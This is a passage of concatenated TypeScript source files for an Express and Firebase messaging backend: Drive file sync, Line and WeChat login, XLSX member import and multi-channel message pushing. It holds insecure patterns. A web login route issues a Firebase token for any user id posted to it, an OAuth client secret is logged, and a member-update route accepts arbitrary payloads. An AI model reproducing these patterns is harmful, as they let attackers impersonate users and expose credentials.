 * @param now - sync timestamp stamped on touched records
 * @returns resolves with the Drive file id, or the string "err" on a
 *          Drive update failure (note: resolves rather than rejects)
 */
export const renameFile = (auth: OAuth2Client, fileId: string, fullName: string, now: number): Promise<string> => {
    return new Promise(async (resolve, reject) => {
        const drive = google.drive({ version: 'v3', auth });
        let file
        let ext = ""
        await getFileById(fileId).then(async doc => {
            if (doc.exists) {
                file = doc.data()
                file["modifiedDate"] = now
                file.name = fullName
                // Re-parse the optional "NN." sort prefix into sid.
                if (file.name.indexOf(".") != -1) {
                    if (!isNaN(Number(file.name.substring(0, file.name.indexOf("."))))) {
                        file["sid"] = parseInt(file.name.substring(0, file.name.indexOf(".")))
                        file["name"] = file.name.substring(file.name.indexOf(".") + 1, file.name.length)
                    } else {
                        // console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
                        file["sid"] = 0
                    }
                } else {
                    // console.log("No sid:", file.name.substring(0, file.name.indexOf(".")))
                    file["sid"] = 0
                }
                // Non-folders keep their previous extension on fullName.
                if (file.mimeType != "application/vnd.google-apps.folder") {
                    if (file.fullName.lastIndexOf(".") != -1) {
                        ext = file.fullName.substring(file.fullName.lastIndexOf(".") + 1, file.fullName.length)
                        file["fullName"] = fullName + "." + ext
                        console.log("ext:", ext)
                    } else {
                        file["fullName"] = fullName
                    }
                } else {
                    file["fullName"] = fullName
                }
            }
        })
        console.log("file:", file)
        await rename(file)
        // Renamed folders: re-mirror the subtree with the new ancestry chain.
        if (file.mimeType == "application/vnd.google-apps.folder") {
            try {
                let pName = file["parentsName"].slice()
                pName.push({ fullName: fullName, name: file.name, id: file.id })
                await listFiles(auth, file.id, pName, now)
            } catch (err) {
                console.log(err)
            }
        }
        let fileMetadata = {
            'name': file.fullName,
            'mimeType': file.mimeType
        };
        drive.files.update({
            resource: fileMetadata,
            'fileId': fileId,
            fields: 'id'
        }, function (err, file) {
            if (err) {
                // Handle error
                console.error("err:", err.response);
                resolve("err")
            } else {
                console.log(`The fileId of renamed file : ${file.data.id}`);
                resolve(file.data.id);
            }
        });
    })
}
/**
 * Moves a file to another Drive folder and mirrors the move in Firestore
 * (new parents id plus the destination appended to the ancestry chain),
 * then swaps the Drive parents via files.update.
 *
 * NOTE(review): the inner getFileById/rename calls are not awaited, so the
 * Firestore update may still be in flight when this resolves — confirm
 * whether callers depend on it having completed.
 *
 * @param auth - authorized OAuth2 client
 * @param fileId - id of the file to move
 * @param folderId - destination folder id
 * @param now - sync timestamp stamped on the record
 * @returns resolves with the Drive file id, or the strings "get err"/"err"
 *          on Drive API failures (note: resolves rather than rejects)
 */
export const moveFile = (auth: OAuth2Client, fileId: string, folderId: string, now: number): Promise<string> => {
    return new Promise(async (resolve, reject) => {
        const drive = google.drive({ version: 'v3', auth });
        let fileInfo
        let folderInfo
        await getFileById(fileId).then(async doc => {
            if (doc.exists) {
                fileInfo = doc.data()
                fileInfo["modifiedDate"] = now
                fileInfo["parents"] = folderId
                getFileById(folderId).then(folder => {
                    if (folder.exists) {
                        folderInfo = folder.data()
                        let pName = fileInfo["parentsName"].slice()
                        pName.push({ fullName: folderInfo.name, name: folderInfo.name, id: folderId })
                        fileInfo["parentsName"] = pName
                        console.log("file:", fileInfo)
                        rename(fileInfo)
                    }
                })
            }
        })
        // Retrieve the existing parents to remove
        drive.files.get({
            fileId: fileId,
            fields: 'parents'
        }, function (err, file) {
            if (err) {
                // Handle error
                console.error("get err:", err.response.data);
                resolve("get err")
            } else {
                console.log("get file:", file.data);
                // Move the file to the new folder
                var previousParents = file.data.parents.join(',');
                drive.files.update({
                    fileId: fileId,
                    addParents: folderId,
                    removeParents: previousParents,
                    fields: 'id, parents'
                }, function (err, file) {
                    if (err) {
                        // Handle error
                        console.error("err:", err.response);
                        resolve("err")
                    } else {
                        console.log(`The fileId of moved file : ${file.data.id}`);
                        resolve(file.data.id);
                    }
                });
            }
        });
    })
}
<file_sep>/src/services/structureService.ts
import * as admin from 'firebase-admin';
import { IssueOrganization } from '../model';

// Firestore collection describing the issue organization tree.
const structureCollection = admin.firestore().collection("IssueOrganization");

/** Fetch every organization node whose "type" field is "issue". */
export const getStructures = function () {
    return structureCollection.where("type", "==", "issue").get()
}

/** Fetch organization nodes of an arbitrary type. */
export const getStructuresByType = function (type: string) {
    return structureCollection.where("type", "==", type).get()
}

/**
 * Query nodes by their "issueId" field.
 * (Parameter renamed from the misleading `companyName`.)
 */
export const getStructureByIssueId = function (issueId: string) {
    return structureCollection.where("issueId", "==", issueId).get()
}

/** Query nodes by their "parentId" field. */
export const getStructureByParentId = function (parentId: string) {
    return structureCollection.where("parentId", "==", parentId).get()
}

/** Create or merge an organization node keyed by its own id. */
export const setStructure = function (structure: IssueOrganization) {
    return structureCollection.doc(structure.id).set(structure, { merge: true })
}
import { Router } from "express"
import axios from "axios"
import * as queryString from "querystring"
import * as jwt from "jsonwebtoken"
import * as jws from "jws"
import * as memberService from './services/memberService'
import { jwtSecretKey, uriName, ServerUrlPrefix, lineLoginConfig, wechatAccount } from './config'
import * as admin from 'firebase-admin';
const router = Router()
/**
 * Mint a Firebase custom auth token whose uid is the given user id, letting
 * the client sign in to Firebase as that user.
 */
function generateFirebaseToken(userId) {
    const uid = userId
    return admin.auth().createCustomToken(uid)
}
// Exchange a Line Login authorization code for the user's profile, then
// verify the member exists and is active before issuing a Firebase token.
// Responds 200 with { lineId, token, name, divsionName } on success,
// 403 otherwise.
router.post("/verifyLineUser", async (req, res) => {
    const code = req.body.code
    const page = req.body.page
    console.log("----", code + " " + page)
    console.log(queryString.stringify({
        grant_type: "authorization_code",
        code: code,
        redirect_uri: lineLoginConfig.redirectUri + (page ? page : "login"),
        client_id: lineLoginConfig.clientId,
        client_secret: lineLoginConfig.clientSecret
    }))
    // The redirect_uri must match the one used when the code was issued;
    // `page` selects which frontend route initiated the login.
    const lineVerifyResult = await axios.post("https://api.line.me/oauth2/v2.1/token", queryString.stringify({
        grant_type: "authorization_code",
        code: code,
        redirect_uri: lineLoginConfig.redirectUri + (page ? page : "login"),
        client_id: lineLoginConfig.clientId,
        client_secret: lineLoginConfig.clientSecret
    }), {
        headers: {
            "Content-Type": "application/x-www-form-urlencoded"
        }
    }).catch(error => {
        // Swallow transport/OAuth errors into null; the null check below
        // turns them into a clean 403.
        console.log("lineVerify failed")
        return null
    })
    if (lineVerifyResult != null) {
        // The id_token is a JWT signed with the channel secret; `sub` is the
        // user's Line user id.
        const lineToken = lineVerifyResult.data.id_token
        const profile = jwt.verify(lineToken, lineLoginConfig.clientSecret) as any
        console.log(profile)
        memberService.getMemberByAnyId(profile.sub).then(async snapshot => {
            if (!snapshot.empty) {
                let sales = snapshot.docs[0].data()
                // Only members who still follow the account and are active
                // may sign in.
                if (!sales.unfollow && sales.isActive) {
                    let firebaseToken = await generateFirebaseToken(sales.lineId).catch(error => {
                        console.log("generateFirebaseToken error:", error)
                    })
                    res.status(200).send({ lineId: sales.lineId, token: firebaseToken, name: sales.name, divsionName: sales.divsionName })
                } else
                    res.status(403).send({ lineId: profile.sub, msg: "member is not active" })
            } else
                res.status(403).send({ lineId: profile.sub, msg: "snapshot is empty" })
        }).catch(error => {
            console.log("verify user error:", error)
            res.status(403).send("verify failed, please retry.")
        })
    } else {
        res.status(403).send("verify failed")
    }
})
// Exchange a WeChat OAuth code for the user's openid, then verify the member
// exists and is active before issuing a Firebase token.
// Responds 200 with { wechatId, token, name, divsionName } on success,
// 403 otherwise.
router.post("/verifyWechatUser", async (req, res) => {
    const code = req.body.code
    // FIX: mirror /verifyLineUser — without this .catch a WeChat API failure
    // produced an unhandled promise rejection instead of a 403 response.
    const wechatVerifyResult = await axios.get(`https://api.weixin.qq.com/sns/oauth2/access_token?appid=${wechatAccount.id}&secret=${wechatAccount.secret}&code=${code}&grant_type=authorization_code`).catch(error => {
        console.log("wechatVerify failed")
        return null
    })
    if (wechatVerifyResult != null) {
        const wechatId = wechatVerifyResult.data.openid
        memberService.getMemberByAnyId(wechatId).then(async snapshot => {
            if (!snapshot.empty) {
                let member = snapshot.docs[0].data()
                // Only members who still follow the account and are active
                // may sign in.
                if (!member.unfollow && member.isActive) {
                    let firebaseToken = await generateFirebaseToken(member.wechatId).catch(error => {
                        console.log("generateFirebaseToken error:", error)
                    })
                    res.status(200).send({ wechatId: member.wechatId, token: firebaseToken, name: member.name, divsionName: member.divsionName })
                } else
                    res.status(403).send({ wechatId: wechatId })
            } else
                res.status(403).send({ wechatId: wechatId })
        }).catch(error => {
            console.log("verify user error:", error)
            res.status(403).send("verify failed, please retry.")
        })
    } else {
        res.status(403).send("verify failed")
    }
})
// Mint a Firebase custom token for a web client identified by `code`.
// FIX: the original sent a 403 inside the catch and then fell through to
// send a 200 as well, raising "Cannot set headers after they are sent".
router.post("/verifyWebUser", async (req, res) => {
    const code = req.body.code
    try {
        const firebaseToken = await generateFirebaseToken(code)
        res.status(200).send({ token: firebaseToken })
    } catch (error) {
        console.log("generateFirebaseToken error:", error)
        res.status(403).send({ error: error })
    }
})
// Validate a short-lived access token and, when still fresh and the member
// exists, rotate it: respond 200 with a newly signed HS512 token, else 403.
router.post("/verifyUser", (req, res) => {
    const accessToken = req.body.accessToken
    jwt.verify(accessToken, jwtSecretKey, (err, result) => {
        if (err) {
            console.log("verifyUser err:", err)
            res.status(403).send("Not Authorized")
        } else {
            console.log("verifyUser result:", result)
            const now = Date.now()
            // Accept only tokens issued within the last 15 minutes.
            if (Math.floor(now / 1000) - result.iat < 900) { // in 15 mins
                memberService.getMemberByAnyId(result.sub).then(salesSnapshot => {
                    if (!salesSnapshot.empty) {
                        // NOTE(review): `iat` here is set 15 minutes in the
                        // FUTURE — it appears to be used as an expiry marker
                        // for the freshness check above rather than a true
                        // issued-at time; confirm this is intentional.
                        const newToken = jws.sign({
                            header: { alg: "HS512" },
                            payload: {
                                sub: result.sub,
                                iat: Math.floor(now / 1000) + (15 * 60)
                            },
                            secret: jwtSecretKey
                        })
                        console.log("newToken:", newToken)
                        res.status(200).send(newToken)
                    } else {
                        res.status(403).send("Not Authorized")
                    }
                }).catch(error => {
                    console.log("verifyUser failed:", error)
                    res.status(403).send("Not Authorized")
                })
            } else
                res.status(403).send("Not Authorized")
        }
    })
})
// app.use(ServerUrlPrefix, router)
export default router<file_sep>/src/memberWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as XLSX from 'xlsx'
import * as memberService from "./services/memberService"
import * as groupService from "./services/groupService"
import * as batchGroupService from "./services/groupMessageService"
import { Member, Group, BatchGroup } from "./model"
const router = Router()
// Import a group from an uploaded XLSX (base64 data URL in req.body.file).
// Row format (first row is a header): col 0 = member identifier, col 1 =
// optional per-member message. When every processed row has an empty message
// the upload is stored as a plain Group; otherwise as a BatchGroup whose
// members carry individual message content.
router.post("/importGroup", async (req, res) => {
    let base64String = req.body.file;
    let base64Image = base64String.split(';base64,').pop();
    /* data is a node Buffer that can be passed to XLSX.read */
    let workbook = XLSX.read(base64Image, { type: 'base64' });
    let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
    let ownerId = ""
    let groupName: string = ""
    let type: string = ""
    let memberUploads = new Array<{ personalId: string, name?: string, mobilePhone?: string, email?: string, index?: number, message: string }>()
    if (req.body.hasOwnProperty("ownerId")) {
        ownerId = req.body.ownerId
    }
    if (req.body.hasOwnProperty("groupName")) {
        groupName = req.body.groupName
    }
    // Skip the header row, normalize each data row to { personalId, message }.
    for (let i = 1; i < data.length; i++) {
        let cols = data[i]
        if (cols.length >= 1) {
            if (cols.length <= 1) {
                cols[1] = ""
            }
            let newMember = {
                personalId: cols[0] || "",
                message: cols[1] || ""
            }
            memberUploads.push({
                personalId: newMember.personalId.toString().trim(),
                message: newMember.message.toString().trim()
            })
            // NOTE(review): `type` is overwritten on every row, so only the
            // LAST row decides whether this import is "messageless" — confirm
            // mixed sheets are not expected.
            if (cols[1].toString().trim() == "") {
                type = "messageless"
            } else {
                type = ""
            }
        }
    }
    let newGroup: Group = { id: uuidv4(), name: groupName, memberId: [], ownerId: ownerId }
    let newGroupMessage: BatchGroup = { id: uuidv4(), name: groupName, members: [], ownerId: ownerId }
    // console.log("memberUploads:", memberUploads)
    for (const memberUpload of memberUploads) {
        /**
         * Check whether the Member master record exists
         */
        const memberSnapshot = await memberService.getMembersByName(memberUpload.personalId)
        let member: Member
        if (memberSnapshot.empty) {
            // Unknown members are skipped silently (only logged).
            console.log("====Member不存在====")
        } else {
            // If it exists, collect it into the group / batch message.
            member = memberSnapshot.docs[0].data() as Member
            if (newGroup.memberId.indexOf(member.id) < 0) {
                newGroup.memberId.push(member.id)
            }
            if (memberUpload.message != "") {
                newGroupMessage.members.push({ id: member.id, content: memberUpload.message })
            }
            // console.log("memberUpload:", memberUpload)
            if (memberUpload.message != "") {
                // NOTE(review): both branches below build the identical object;
                // the hasOwnProperty("data") split currently has no effect.
                if (member.hasOwnProperty("data")) {
                    member = {
                        ...member,
                        data: [{
                            message: memberUpload.message
                        }]
                    }
                } else {
                    member = {
                        ...member,
                        data: [{
                            message: memberUpload.message
                        }]
                    }
                }
                // await memberService.updateMember(member)
            }
        }
    }
    console.log("importGroup:", newGroup)
    console.log("importGroupMessage:", newGroupMessage)
    // Persist as a plain group or as a batch-message group (see header note).
    if (type == "messageless") {
        await groupService.setGroup(newGroup)
    } else {
        await batchGroupService.setBatchGroup(newGroupMessage)
    }
    res.sendStatus(200)
})
// Create or overwrite a group document with the request body as-is.
router.post("/updateGroup", async (req, res) => {
    const group: Group = req.body
    try {
        await groupService.setGroup(group)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
// Create or overwrite a batch-message group with the request body as-is.
router.post("/updateBatchGroup", async (req, res) => {
    const batchGroup: BatchGroup = req.body
    try {
        await batchGroupService.setBatchGroup(batchGroup)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
// Delete a group document by the id carried in the URL path.
router.delete("/deleteGroup/:groupId", async (req, res) => {
    const targetId: string = req.params.groupId
    try {
        await groupService.deleteGroup(targetId)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
// Delete a batch-message group by the id carried in the URL path.
router.delete("/deleteBatchGroup/:batchGroupId", async (req, res) => {
    const targetId: string = req.params.batchGroupId
    try {
        await batchGroupService.deleteBatchGroup(targetId)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
// Import members from an uploaded XLSX (base64 data URL in req.body.file).
// Row format (first row is a header): 0=personalId 1=name 2=title 3=division
// 4=department 5=mobilePhone 6=email 7=lineId 8=wechatId 9=index 10=referrer.
// Existing members (matched by mobilePhone + name) only have division and
// department refreshed; unknown members are created with role "customer".
router.post("/importMember", async (req, res) => {
    let base64String = req.body.file;
    let base64Image = base64String.split(';base64,').pop();
    /* data is a node Buffer that can be passed to XLSX.read */
    let workbook = XLSX.read(base64Image, { type: 'base64' });
    let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
    let memberUploads = new Array<{ personalId: string, name: string, title: string, division: string, department: string, mobilePhone: string, email: string, lineId?: string, wechatId?: string, index?: number, referrer?: string }>()
    for (let i = 1; i < data.length; i++) {
        let cols = data[i]
        if (cols.length >= 8) {
            // Backfill the optional trailing columns so the .toString() calls
            // below never hit undefined.
            if (!cols[10]) {
                cols[10] = ""
            }
            if (!cols[9]) {
                cols[9] = new Date().getTime().toString()
            }
            // console.log("cols:", cols)
            let newMember = {
                personalId: cols[0] || uuidv4(),
                name: cols[1] || "",
                title: cols[2] || "",
                division: cols[3] || "",
                department: cols[4] || "",
                mobilePhone: cols[5] || "",
                email: cols[6] || "",
                lineId: cols[7] || "",
                wechatId: cols[8] || "",
                index: +cols[9],
                referrer: cols[10].toString().trim()
            }
            memberUploads.push({
                personalId: newMember.personalId.toString().trim(),
                name: newMember.name.toString().trim(),
                title: newMember.title.toString().trim(),
                division: newMember.division.toString().trim(),
                department: newMember.department.toString().trim(),
                mobilePhone: newMember.mobilePhone.toString().trim(),
                email: newMember.email.toString().trim(),
                lineId: newMember.lineId.toString().trim(),
                wechatId: newMember.wechatId.toString().trim(),
                index: +cols[9],
                referrer: cols[10].toString().trim()
            })
        }
    }
    for (const memberUpload of memberUploads) {
        /**
         * Check whether the Member master record exists
         */
        const memberSnapshot = await memberService.getMemberByMobilePhoneAndName(memberUpload.mobilePhone, memberUpload.name)
        let member: Member
        if (memberSnapshot.empty) {
            console.log("====Member不存在====")
            // Not found: create a new Member record.
            if (!memberUpload.index) {
                memberUpload.index = new Date().getTime()
            }
            member = {
                id: memberUpload.personalId,
                name: memberUpload.name,
                title: memberUpload.title,
                division: memberUpload.division,
                department: memberUpload.department,
                email: memberUpload.email,
                mobilePhone: memberUpload.mobilePhone,
                lineId: memberUpload.lineId,
                wechatId: memberUpload.wechatId,
                role: "customer",
                index: memberUpload.index,
                unReadMessages: 0
            }
        } else {
            // Found: refresh division / department only (title and the
            // messaging ids are deliberately left untouched — see the
            // commented-out blocks below).
            member = memberSnapshot.docs[0].data() as Member
            // if (memberUpload.title && memberUpload.title !== "")
            //     member.title = memberUpload.title
            if (memberUpload.division && memberUpload.division !== "")
                member.division = memberUpload.division
            if (memberUpload.department && memberUpload.department !== "")
                member.department = memberUpload.department
            // // If it exists, optionally refresh LineId / WeChatId (disabled)
            // if (memberUpload.lineId && memberUpload.lineId !== "")
            //     member.lineId = memberUpload.lineId
            // if (memberUpload.wechatId && memberUpload.wechatId !== "")
            //     member.wechatId = memberUpload.wechatId
        }
        await memberService.setMember(member)
        console.log("--------------------------------------------------")
    }
    res.sendStatus(200)
})
// Upsert a member document with the payload exactly as posted.
router.post("/updateMember", async (req, res) => {
    const payload: Member = req.body
    console.log("updateMember:", payload)
    const memberToSave: Member = { ...payload }
    try {
        await memberService.setMember(memberToSave)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
    console.log("--------------------------------------------------")
})
// Delete a member document by the id carried in the URL path.
router.delete("/deleteMember/:memberId", async (req, res) => {
    const targetId: string = req.params.memberId
    try {
        await memberService.deleteMember(targetId)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
export default router
<file_sep>/src/services/messageRecordService.ts
import { firestore } from "firebase-admin"
import { MessageRecord, RecordDetail } from "../model"
const messageRecordCollection = firestore().collection("MessageRecord")
export const getMessageRecordUUID = (): string => {
return messageRecordCollection.doc().id
}
export const setMessageRecord = (messageRecord: MessageRecord) => {
return messageRecordCollection
.doc(messageRecord.id)
.set(messageRecord, { merge: true })
}
export const getRecordDetailUUID = (messageRecordId: string): string => {
return messageRecordCollection.doc(messageRecordId).collection("RecordDetail").doc().id
}
export const setRecordDetail = (messageRecordId: string, recordDetail: RecordDetail) => {
return messageRecordCollection
.doc(messageRecordId)
.collection("RecordDetail")
.doc(recordDetail.id)
.set(recordDetail, { merge: true })
}
export const setRecordDetailMQ = (messageRecordId: string, recordDetail: any) => {
return messageRecordCollection
.doc(messageRecordId)
.collection("RecordDetail")
.doc(recordDetail.id)
.set(recordDetail, { merge: true })
}
export const getMessageRecords = () => {
return messageRecordCollection.get()
}
export const getMessageRecordById = (messageRecordId: string) => {
return messageRecordCollection.doc(messageRecordId).get()
}
export const getRecordDetails = (messageRecordId: string) => {
return messageRecordCollection
.doc(messageRecordId)
.collection("RecordDetail")
.get()
}
export const getRecordDetailById = (messageRecordId: string, recordDetailId: string) => {
return messageRecordCollection.doc(messageRecordId)
.collection("RecordDetail").doc(recordDetailId)
.get()
}<file_sep>/src/services/userService.ts
import * as admin from "firebase-admin"
import { idLength } from "../config"
import { User } from "../model"
const userCollection = admin.firestore().collection("User")
export const getUserById = (id: string) => {
return userCollection.doc(id).get().then(doc => {
if (doc.exists)
return doc.data() as User
return null
})
}
export const getUserByEmail = function (email: string) {
return userCollection.where("email", "==", email).get()
}
export const setUser = function (user: User) {
// console.log(JSON.stringify(user, null, 4))
return userCollection.doc(user.id).set(user, { merge: true })
}
export const deleteUser = function (id: string) {
return userCollection.doc(id).delete()
}<file_sep>/src/services/issueService.ts
import * as admin from 'firebase-admin';
import { Issue } from '../model';
const issueCollection = admin.firestore().collection("Issue");
export const getIssues = function() {
return issueCollection.get()
}
export const getIssueById = function (companyName: string) {
return issueCollection.where("id", "==", companyName).get()
}
export const getIssueByParentId = function (companyName: string) {
return issueCollection.where("parentId", "==", companyName).get()
}
export const setIssue = function (member: Issue) {
return issueCollection.doc(member.id).set(member, { merge: true })
}<file_sep>/src/pushMessageWS.ts
import { Router } from "express"
import * as messageRecordService from "./services/messageRecordService"
import * as memberService from "./services/memberService"
import { pushMessage as pushLineMessage, toPersonMessage, toLineTextMessage } from "./services/lineService"
import { pushTemplateMessages as pushWechatMessages, pushCustomMessage, toTemplateMessagesMQ, toCustomTextMessage } from "./services/wechatService"
import { pushMessage as pushSMSMessage, toSMSMessage } from "./services/smsService"
import { pushMessage as pushEmailMessage, getEmailFiles, toEmailMessage } from "./services/emailService"
import { Receiver, Member, RecordDetail, ChatMessage, MessageTemplate } from "./model"
import * as chatMessageService from './services/chatMessageService'
import { backendUrl, idLength } from "./config"
import { resolve } from "path";
const router = Router()
// Broadcast a templated message to a list of receivers over the channel named
// in messageObj.channel (WeChat / Line / SMS / Email). Placeholders in the
// template are expanded per receiver; each successful WeChat/Line send is
// mirrored into the chat history via createChatMessage. Always responds 200.
router.post("/pushMessage", async (req, res, next) => {
    const sender: Member = req.body.sender
    const receivers: Receiver[] = req.body.receivers
    const messageTemplate: MessageTemplate = req.body.messageObj
    let content: string = ""
    let storageUrls: MessageTemplate["urls"] = []
    let thumb: string = ""
    if (req.body.hasOwnProperty("messageObj")) {
        content = req.body.messageObj.content
        if (req.body.messageObj.hasOwnProperty("urls")) {
            storageUrls = req.body.messageObj.urls
        }
        if (req.body.messageObj.hasOwnProperty("thumb")) {
            thumb = req.body.messageObj.thumb
        }
    }
    // Send/success counters for this broadcast (not persisted in this handler).
    let messageRecord = {
        id: messageRecordService.getMessageRecordUUID(),
        sendCount: 0,
        successCount: 0,
        type: "text"
    }
    const pushMessagePromises = new Array<Promise<any>>()
    if (sender.path)
        sender.path = `(${sender.path})\n`
    // NOTE(review): the getMemberById(...).then(...) chains below are never
    // awaited or collected, so Promise.all at the bottom very likely runs
    // before any push promise has been pushed — the 200 response and the
    // counters do not reflect actual delivery. Confirm whether fire-and-forget
    // is intended here.
    for (const receiver of receivers) {
        memberService.getMemberById(receiver.id).then(async member => {
            let formatedContent = content
            // Per-receiver placeholder data; only the array form is handled.
            if (receiver.hasOwnProperty("data")) {
                if (receiver.data instanceof Array) {
                    for (let datum of receiver.data) {
                        if (receiver.hasOwnProperty("name")) {
                            datum['name'] = member.name
                        }
                        formatedContent = formatContentByMQ(content, datum)
                    }
                } else {
                    // if (receiver.hasOwnProperty("name")) {
                    //     receiver.data['name'] = member.name
                    // }
                    // formatedContent = formatContentByMQ(content, receiver.data)
                }
            }
            // Optional "item" payload: expand its fields plus the {{item}} name.
            if (req.body.hasOwnProperty("item")) {
                formatedContent = formatItemContentByMQ(formatedContent, req.body.item.data)
                formatedContent = formatedContent.replace(/{{item}}/g, req.body.item.name || "")
            } else {
            }
            // NOTE(review): the bare resolve() calls in the .catch handlers
            // below invoke path.resolve imported at the top of this file — it
            // returns the cwd string, not a promise resolution. Presumably
            // Promise.resolve() was intended; confirm.
            if (messageTemplate.channel == "WeChat") {
                if (member.wechatId && member.wechatId !== "") {
                    // const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
                    const wechatMessages = toTemplateMessagesMQ(sender, member.wechatId, formatedContent, storageUrls, thumb)
                    if (wechatMessages) {
                        messageRecord.sendCount += 1
                        pushMessagePromises.push(
                            pushWechatMessages(wechatMessages)
                                .then(() => {
                                    messageRecord.successCount += 1
                                    return createChatMessage(sender, member, messageTemplate.channel, formatedContent, storageUrls, thumb)
                                })
                                .catch(() => {
                                    return resolve()
                                })
                        )
                    }
                }
            }
            if (messageTemplate.channel == "Line") {
                // if (receiver.hasOwnProperty("groupId")) {
                //     member['lineId'] = receiver.groupId
                // }
                if (member.lineId && member.lineId !== "") {
                    // if (receiver.lineId.substring(0, 1) == "U") {
                    // const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
                    const lineMessage = toPersonMessage(sender, formatedContent, storageUrls, thumb, messageTemplate.type)
                    if (lineMessage) {
                        messageRecord.sendCount += 1
                        // console.log("lineMessage:", JSON.stringify(lineMessage, null, 4))
                        pushMessagePromises.push(
                            pushLineMessage(member.lineId, lineMessage)
                                .then(() => {
                                    messageRecord.successCount += 1
                                    return createChatMessage(sender, member, messageTemplate.channel, formatedContent, storageUrls, thumb)
                                })
                                .catch(() => {
                                    return resolve()
                                })
                        )
                    }
                    // }
                }
            }
            if (messageTemplate.channel == "SMS") {
                const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
                let smsMessage = toSMSMessage(sender, formatedContent)
                if (member.mobilePhone && smsMessage) {
                    messageRecord.sendCount += 1
                    pushMessagePromises.push(
                        pushSMSMessage(member.mobilePhone, smsMessage)
                            .then(() => {
                                messageRecord.successCount += 1
                                return resolve()
                            })
                            .catch(() => {
                                return resolve()
                            })
                    )
                }
            }
            if (messageTemplate.channel == "Email") {
                const emailFiles = await getEmailFiles([])
                const trackId = messageRecordService.getRecordDetailUUID(messageRecord.id)
                // messageRecord.id + trackId forms the tracking token embedded
                // in the email for open tracking.
                const emailmessage = await toEmailMessage(sender, formatedContent, messageRecord.id + trackId, emailFiles)
                if (member.email && emailmessage) {
                    messageRecord.sendCount += 1
                    pushMessagePromises.push(
                        pushEmailMessage(member.email, emailmessage)
                            .then(() => {
                                messageRecord.successCount += 1
                                return resolve()
                            })
                            .catch(() => {
                                return resolve()
                            })
                    )
                }
            }
        })
    }
    await Promise.all(pushMessagePromises).then(result => {
    }).catch(error => {
        console.log(error)
        // res.sendStatus(500)
    })
    res.sendStatus(200)
})
// Send a staff reply to a single member over WeChat or Line, then record it
// in the chat history. Responds 200 on success, 403 on failure or when the
// receiver is missing. Unknown channels send nothing but still record/200.
router.post("/replyMessage", async (req, res, next) => {
    const receiver = req.body.receiver as Member
    const message = req.body.message as string
    let storageUrls: MessageTemplate["urls"] = []
    const staff = req.body.staff as Member
    const channel = req.body.channel
    if (req.body.hasOwnProperty("urls")) {
        storageUrls = req.body.urls
    }
    console.log("receiver:", receiver)
    console.log("message:", message)
    console.log("staff:", staff)
    console.log("channel:", channel)
    const pushMessagePromises = new Array<Promise<any>>()
    if (receiver && receiver != null) {
        // let channel = ""
        if (channel == "WeChat") {
            // WeChat replies go through the customer-service message API.
            const wechatMessages = toCustomTextMessage(receiver, message)
            pushMessagePromises.push(pushCustomMessage(wechatMessages))
            // const wechatMessages = toTemplateMessagesMQ(staff, receiver.wechatId, message, storageUrls, "")
            // pushMessagePromises.push(pushWechatMessages(wechatMessages))
        } else if (channel == "Line") {
            // Line replies may combine a text bubble with attachment messages.
            let lineMessage = []
            if (message != "") {
                lineMessage.push(toLineTextMessage(staff, message))
            }
            if (storageUrls.length > 0) {
                lineMessage = lineMessage.concat(toPersonMessage(staff, "", storageUrls, ""))
            }
            if (lineMessage.length > 0) {
                pushMessagePromises.push(pushLineMessage(receiver.lineId, lineMessage))
            }
            // channel = "Line"
        }
        await Promise.all(pushMessagePromises).then(result => {
            // console.log(JSON.stringify(result, null, 4))
            // NOTE(review): createChatMessage is not awaited — the 200 may be
            // sent before the history write completes; confirm intended.
            createChatMessage(staff, receiver, channel, message, storageUrls, "")
            res.sendStatus(200)
        }).catch(error => {
            console.log(error)
            res.sendStatus(403)
        })
    } else {
        res.sendStatus(403)
    }
})
/**
 * Substitute every {{key}} placeholder in `message` with the matching value
 * from `data`; numeric values are rendered with thousands separators.
 * @param message template text containing {{key}} placeholders
 * @param data flat map of placeholder name -> replacement value
 * @returns the message with all known placeholders replaced
 */
const formatContentByMQ = (message: string, data: any): string => {
    let content = message
    for (const key in data) {
        // FIX: escape regex metacharacters so keys like "a.b" are matched
        // literally instead of being interpreted as patterns.
        const safeKey = key.replace(/[.*+?^${}()|[\]\\]/g, "\\$&")
        const regex = new RegExp("{{" + safeKey + "}}", "g")
        const tmp = data[key]
        // FIX: use a replacer function so "$&"/"$1" inside replacement values
        // are inserted verbatim rather than expanded by String.replace.
        if (typeof tmp == "number")
            content = content.replace(regex, () => numberWithCommas(tmp))
        else
            content = content.replace(regex, () => tmp)
    }
    return content
}
/**
 * Substitute {{key}} placeholders using an item's data map; numeric values
 * are rendered with thousands separators. (Mirrors formatContentByMQ but is
 * applied to the optional "item" payload.)
 * @param message template text containing {{key}} placeholders
 * @param data flat map of placeholder name -> replacement value
 * @returns the message with all known placeholders replaced
 */
const formatItemContentByMQ = (message: string, data: any): string => {
    let content = message
    for (const key in data) {
        // FIX: escape regex metacharacters so keys are matched literally.
        const safeKey = key.replace(/[.*+?^${}()|[\]\\]/g, "\\$&")
        const regex = new RegExp("{{" + safeKey + "}}", "g")
        const tmp = data[key]
        // FIX: replacer function prevents "$&"/"$1" expansion in values.
        if (typeof tmp == "number")
            content = content.replace(regex, () => numberWithCommas(tmp))
        else
            content = content.replace(regex, () => tmp)
    }
    return content
}
/**
 * Record an outbound staff message in the receiver's chat history.
 * The ChatMessage document id is the receiver's channel-specific id
 * (lineId for Line, wechatId for WeChat, otherwise the member id); a
 * RecordDetail row is appended beneath it, pre-marked as read/succeeded.
 * @returns promise for the RecordDetail write
 */
const createChatMessage = async (staff: Member, receiver: Member, channel: string, message: string, storageUrls: MessageTemplate["urls"], thumb: string) => {
    // let memberSnapShot = await memberService.getMemberByAnyId(receiver)
